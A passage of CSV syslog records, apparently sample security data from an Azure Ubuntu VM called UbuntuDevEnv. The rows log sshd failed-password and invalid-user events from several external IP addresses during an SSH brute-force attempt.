+16006,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:43:10,UbuntuDevEnv,2019-06-26 06:43:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,33192,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16007,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:43:10,UbuntuDevEnv,2019-06-26 06:43:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,33192,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16008,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:43:12,UbuntuDevEnv,2019-06-26 06:43:12,auth,UbuntuDevEnv,info,Failed password for invalid user jenkins from 138.68.29.52 port 47748 ssh2,33192,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,138.68.29.5,47748,,
+16009,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:43:12,UbuntuDevEnv,2019-06-26 06:43:12,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 47748:11: Bye Bye [preauth],33192,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,47748,,
+16010,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:43:12,UbuntuDevEnv,2019-06-26 06:43:12,auth,UbuntuDevEnv,info,Disconnected from invalid user jenkins 138.68.29.52 port 47748 [preauth],33192,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,138.68.29.5,47748,,
+16011,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:45:14,UbuntuDevEnv,2019-06-26 06:45:13,auth,UbuntuDevEnv,info,Failed password for invalid user mosquitto from 64.202.187.152 port 41838 ssh2,33659,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mosquitto,64.202.187.1,41838,,
+16012,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:45:14,UbuntuDevEnv,2019-06-26 06:45:13,auth,UbuntuDevEnv,info,Disconnected from invalid user mosquitto 64.202.187.152 port 41838 [preauth],33659,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mosquitto,64.202.187.1,41838,,
+16013,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:45:14,UbuntuDevEnv,2019-06-26 06:45:13,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 41838:11: Bye Bye [preauth],33659,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,41838,,
+16014,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:45:45,UbuntuDevEnv,2019-06-26 06:45:45,auth,UbuntuDevEnv,info,Invalid user csgoserver from 139.99.98.248 port 41276,33838,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgoserver,139.99.98.2,41276,,
+16015,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:45:45,UbuntuDevEnv,2019-06-26 06:45:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,33838,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16016,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:45:45,UbuntuDevEnv,2019-06-26 06:45:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,33838,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+16017,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:45:47,UbuntuDevEnv,2019-06-26 06:45:47,auth,UbuntuDevEnv,info,Failed password for invalid user csgoserver from 139.99.98.248 port 41276 ssh2,33838,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgoserver,139.99.98.2,41276,,
+16018,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:45:47,UbuntuDevEnv,2019-06-26 06:45:47,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 41276:11: Bye Bye [preauth],33838,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,41276,,
+16019,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:45:47,UbuntuDevEnv,2019-06-26 06:45:47,auth,UbuntuDevEnv,info,Disconnected from invalid user csgoserver 139.99.98.248 port 41276 [preauth],33838,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgoserver,139.99.98.2,41276,,
+16020,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:45:56,UbuntuDevEnv,2019-06-26 06:45:56,auth,UbuntuDevEnv,info,Invalid user regi from 45.59.69.138 port 33246,33877,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,regi,45.59.69.1,33246,,
+16021,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:45:56,UbuntuDevEnv,2019-06-26 06:45:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,33877,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16022,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:45:56,UbuntuDevEnv,2019-06-26 06:45:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,33877,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+16023,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:45:58,UbuntuDevEnv,2019-06-26 06:45:57,auth,UbuntuDevEnv,info,Failed password for invalid user regi from 45.59.69.138 port 33246 ssh2,33877,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,regi,45.59.69.1,33246,,
+16024,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:45:58,UbuntuDevEnv,2019-06-26 06:45:57,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 33246:11: Bye Bye [preauth],33877,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,33246,,
+16025,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:45:58,UbuntuDevEnv,2019-06-26 06:45:57,auth,UbuntuDevEnv,info,Disconnected from invalid user regi 45.59.69.138 port 33246 [preauth],33877,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,regi,45.59.69.1,33246,,
+16026,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:46:03,UbuntuDevEnv,2019-06-26 06:46:02,auth,UbuntuDevEnv,info,Invalid user laboratory from 138.68.29.52 port 54146,33904,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,laboratory,138.68.29.5,54146,,
+16027,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:46:03,UbuntuDevEnv,2019-06-26 06:46:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,33904,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16028,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:46:03,UbuntuDevEnv,2019-06-26 06:46:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,33904,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16029,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:46:04,UbuntuDevEnv,2019-06-26 06:46:04,auth,UbuntuDevEnv,info,Failed password for invalid user laboratory from 138.68.29.52 port 54146 ssh2,33904,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,laboratory,138.68.29.5,54146,,
+16030,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:46:05,UbuntuDevEnv,2019-06-26 06:46:04,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 54146:11: Bye Bye [preauth],33904,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,54146,,
+16031,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:46:05,UbuntuDevEnv,2019-06-26 06:46:04,auth,UbuntuDevEnv,info,Disconnected from invalid user laboratory 138.68.29.52 port 54146 [preauth],33904,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,laboratory,138.68.29.5,54146,,
+16032,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:46:29,UbuntuDevEnv,2019-06-26 06:46:28,auth,UbuntuDevEnv,info,Invalid user service from 46.101.149.230 port 53606,33992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,service,46.101.149.2,53606,,
+16033,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:46:29,UbuntuDevEnv,2019-06-26 06:46:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,33992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+16034,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:46:29,UbuntuDevEnv,2019-06-26 06:46:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,33992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16035,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:46:30,UbuntuDevEnv,2019-06-26 06:46:30,auth,UbuntuDevEnv,info,Failed password for invalid user service from 46.101.149.230 port 53606 ssh2,33992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,service,46.101.149.2,53606,,
+16036,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:46:30,UbuntuDevEnv,2019-06-26 06:46:30,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 53606:11: Bye Bye [preauth],33992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,53606,,
+16037,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:46:30,UbuntuDevEnv,2019-06-26 06:46:30,auth,UbuntuDevEnv,info,Disconnected from invalid user service 46.101.149.230 port 53606 [preauth],33992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,service,46.101.149.2,53606,,
+16038,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:46:37,UbuntuDevEnv,2019-06-26 06:46:36,auth,UbuntuDevEnv,info,Invalid user apache from 64.202.187.152 port 59276,34026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apache,64.202.187.1,59276,,
+16039,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:46:37,UbuntuDevEnv,2019-06-26 06:46:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,34026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16040,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:46:37,UbuntuDevEnv,2019-06-26 06:46:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,34026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16041,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:46:39,UbuntuDevEnv,2019-06-26 06:46:38,auth,UbuntuDevEnv,info,Failed password for invalid user apache from 64.202.187.152 port 59276 ssh2,34026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apache,64.202.187.1,59276,,
+16042,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:46:39,UbuntuDevEnv,2019-06-26 06:46:38,auth,UbuntuDevEnv,info,Disconnected from invalid user apache 64.202.187.152 port 59276 [preauth],34026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apache,64.202.187.1,59276,,
+16043,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:46:39,UbuntuDevEnv,2019-06-26 06:46:38,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 59276:11: Bye Bye [preauth],34026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,59276,,
+16044,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:16,UbuntuDevEnv,2019-06-26 06:47:15,auth,UbuntuDevEnv,info,Invalid user geng from 87.101.240.10 port 60028,34164,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,geng,87.101.240.1,60028,,
+16045,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:16,UbuntuDevEnv,2019-06-26 06:47:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,34164,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16046,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:16,UbuntuDevEnv,2019-06-26 06:47:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,34164,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16047,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:17,UbuntuDevEnv,2019-06-26 06:47:17,auth,UbuntuDevEnv,info,Failed password for invalid user geng from 87.101.240.10 port 60028 ssh2,34164,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,geng,87.101.240.1,60028,,
+16048,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:18,UbuntuDevEnv,2019-06-26 06:47:17,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 60028:11: Bye Bye [preauth],34164,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,60028,,
+16049,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:18,UbuntuDevEnv,2019-06-26 06:47:17,auth,UbuntuDevEnv,info,Disconnected from invalid user geng 87.101.240.10 port 60028 [preauth],34164,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,geng,87.101.240.1,60028,,
+16050,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:27,UbuntuDevEnv,2019-06-26 06:47:27,auth,UbuntuDevEnv,info,Invalid user team3 from 138.68.29.52 port 43230,34210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,team3,138.68.29.5,43230,,
+16051,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:27,UbuntuDevEnv,2019-06-26 06:47:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,34210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16052,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:27,UbuntuDevEnv,2019-06-26 06:47:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,34210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16053,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:28,UbuntuDevEnv,2019-06-26 06:47:28,auth,UbuntuDevEnv,info,Invalid user song from 139.99.98.248 port 58420,34213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,song,139.99.98.2,58420,,
+16054,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:28,UbuntuDevEnv,2019-06-26 06:47:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,34213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+16055,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:28,UbuntuDevEnv,2019-06-26 06:47:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,34213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16056,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:30,UbuntuDevEnv,2019-06-26 06:47:29,auth,UbuntuDevEnv,info,Failed password for invalid user team3 from 138.68.29.52 port 43230 ssh2,34210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,team3,138.68.29.5,43230,,
+16057,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:30,UbuntuDevEnv,2019-06-26 06:47:29,auth,UbuntuDevEnv,info,Invalid user oracle from 45.59.69.138 port 50812,34219,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,45.59.69.1,50812,,
+16058,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:30,UbuntuDevEnv,2019-06-26 06:47:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,34219,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+16059,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:30,UbuntuDevEnv,2019-06-26 06:47:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,34219,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16060,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:30,UbuntuDevEnv,2019-06-26 06:47:29,auth,UbuntuDevEnv,info,Disconnected from invalid user team3 138.68.29.52 port 43230 [preauth],34210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,team3,138.68.29.5,43230,,
+16061,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:30,UbuntuDevEnv,2019-06-26 06:47:29,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 43230:11: Bye Bye [preauth],34210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,43230,,
+16062,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:30,UbuntuDevEnv,2019-06-26 06:47:30,auth,UbuntuDevEnv,info,Failed password for invalid user song from 139.99.98.248 port 58420 ssh2,34213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,song,139.99.98.2,58420,,
+16063,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:31,UbuntuDevEnv,2019-06-26 06:47:30,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 58420:11: Bye Bye [preauth],34213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,58420,,
+16064,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:31,UbuntuDevEnv,2019-06-26 06:47:30,auth,UbuntuDevEnv,info,Disconnected from invalid user song 139.99.98.248 port 58420 [preauth],34213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,song,139.99.98.2,58420,,
+16065,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:32,UbuntuDevEnv,2019-06-26 06:47:31,auth,UbuntuDevEnv,info,Failed password for invalid user oracle from 45.59.69.138 port 50812 ssh2,34219,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,45.59.69.1,50812,,
